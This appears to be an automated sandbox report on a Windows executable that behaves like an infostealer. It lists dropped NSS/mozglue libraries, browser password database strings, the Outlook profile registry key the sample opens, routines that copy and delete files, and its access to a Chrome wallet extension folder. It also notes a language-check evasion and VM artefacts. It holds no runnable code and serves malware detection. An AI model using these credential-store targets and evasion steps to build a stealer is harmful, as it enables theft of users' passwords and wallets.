Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: z2kQkLtyJW.exe, z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,stmt HIDDEN);
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: z2kQkLtyJW.exe, 00000000.00000003.2001298647.00000000231D4000.00000004.00000020.00020000.00000000.sdmp, KJKJJEGIDBGIDGCBAFHC.0.dr Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: z2kQkLtyJW.exe, 00000000.00000002.2287430235.0000000061EB7000.00000002.00001000.00020000.00000000.sdmp, z2kQkLtyJW.exe, 00000000.00000002.2279839147.000000001D25F000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: softokn3[1].dll.0.dr, softokn3.dll.0.dr Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: z2kQkLtyJW.exe ReversingLabs: Detection: 36%
Source: z2kQkLtyJW.exe Virustotal: Detection: 34%
Source: unknown Process created: C:\Users\user\Desktop\z2kQkLtyJW.exe "C:\Users\user\Desktop\z2kQkLtyJW.exe"
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 3756 -s 2192
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: msimg32.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: msvcr100.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: wininet.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: rstrtmgr.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: ncrypt.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: ntasn1.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: iertutil.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: windows.storage.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: wldp.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: ondemandconnroutehelper.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: winhttp.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: winnsi.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: urlmon.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: srvcli.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: dpapi.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: cryptbase.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: mozglue.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: wsock32.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: msvcp140.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: vcruntime140.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: propsys.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: linkinfo.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Section loaded: windowscodecs.dll Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001 Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Windows\SysWOW64\msvcr100.dll Jump to behavior
Source: Binary string: mozglue.pdbP source: z2kQkLtyJW.exe, 00000000.00000002.2287579030.000000006CFDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: freebl3.pdb source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: freebl3.pdbp source: freebl3[1].dll.0.dr, freebl3.dll.0.dr
Source: Binary string: nss3.pdb@ source: z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: softokn3.pdb@ source: softokn3[1].dll.0.dr, softokn3.dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\vcruntime140.i386.pdb source: vcruntime140.dll.0.dr, vcruntime140[1].dll.0.dr
Source: Binary string: d:\agent\_work\1\s\binaries\x86ret\bin\i386\\msvcp140.i386.pdb source: msvcp140[1].dll.0.dr, msvcp140.dll.0.dr
Source: Binary string: nss3.pdb source: z2kQkLtyJW.exe, 00000000.00000002.2287762530.000000006D19F000.00000002.00000001.01000000.00000007.sdmp, nss3.dll.0.dr, nss3[1].dll.0.dr
Source: Binary string: mozglue.pdb source: z2kQkLtyJW.exe, 00000000.00000002.2287579030.000000006CFDD000.00000002.00000001.01000000.00000008.sdmp, mozglue[1].dll.0.dr, mozglue.dll.0.dr
Source: Binary string: softokn3.pdb source: softokn3[1].dll.0.dr, softokn3.dll.0.dr

Data Obfuscation

barindex
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Unpacked PE file: 0.2.z2kQkLtyJW.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;.rdata:R;.data:W;.reloc:R;
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Unpacked PE file: 0.2.z2kQkLtyJW.exe.400000.0.unpack
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: freebl3.dll.0.dr Static PE information: section name: .00cfg
Source: freebl3[1].dll.0.dr Static PE information: section name: .00cfg
Source: mozglue.dll.0.dr Static PE information: section name: .00cfg
Source: mozglue[1].dll.0.dr Static PE information: section name: .00cfg
Source: msvcp140.dll.0.dr Static PE information: section name: .didat
Source: msvcp140[1].dll.0.dr Static PE information: section name: .didat
Source: nss3.dll.0.dr Static PE information: section name: .00cfg
Source: nss3[1].dll.0.dr Static PE information: section name: .00cfg
Source: softokn3.dll.0.dr Static PE information: section name: .00cfg
Source: softokn3[1].dll.0.dr Static PE information: section name: .00cfg
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004176C5 push ecx; ret 0_2_004176D8
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_6CF9B536 push ecx; ret 0_2_6CF9B549
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\mozglue.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\msvcp140.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\vcruntime140.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File created: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00416240
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion

barindex
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Evasive API call chain: GetUserDefaultLangID, ExitProcess
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\ProgramData\nss3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\mozglue[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\nss3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\msvcp140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\vcruntime140[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\ProgramData\freebl3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\freebl3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\softokn3[1].dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Dropped PE file which has not been started: C:\ProgramData\softokn3.dll Jump to dropped file
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe API coverage: 5.7 %
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00412570
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,LoadLibraryW,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040D1C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004015C0 FindFirstFileA,EntryPoint,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_004015C0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00411650
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040B610 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_0040B610
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_0040DB60
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00411B80
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_0040D540
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_004121F0
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe Code function: 0_2_00401120 GetSystemInfo,ExitProcess, 0_2_00401120
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\ Jump to behavior
Source: C:\Users\user\Desktop\z2kQkLtyJW.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\ Jump to behavior
Source: Amcache.hve.6.dr Binary or memory string: VMware
Source: Amcache.hve.6.dr Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr Binary or memory string: vmci.syshbin
Source: Amcache.hve.6.dr Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr Binary or memory string: VMware20,1hbin@
Source: Amcache.hve.6.dr Binary or memory string: c:\windows\system32\driverstore\filerepository\vmci.inf_amd64_68ed49469341f563
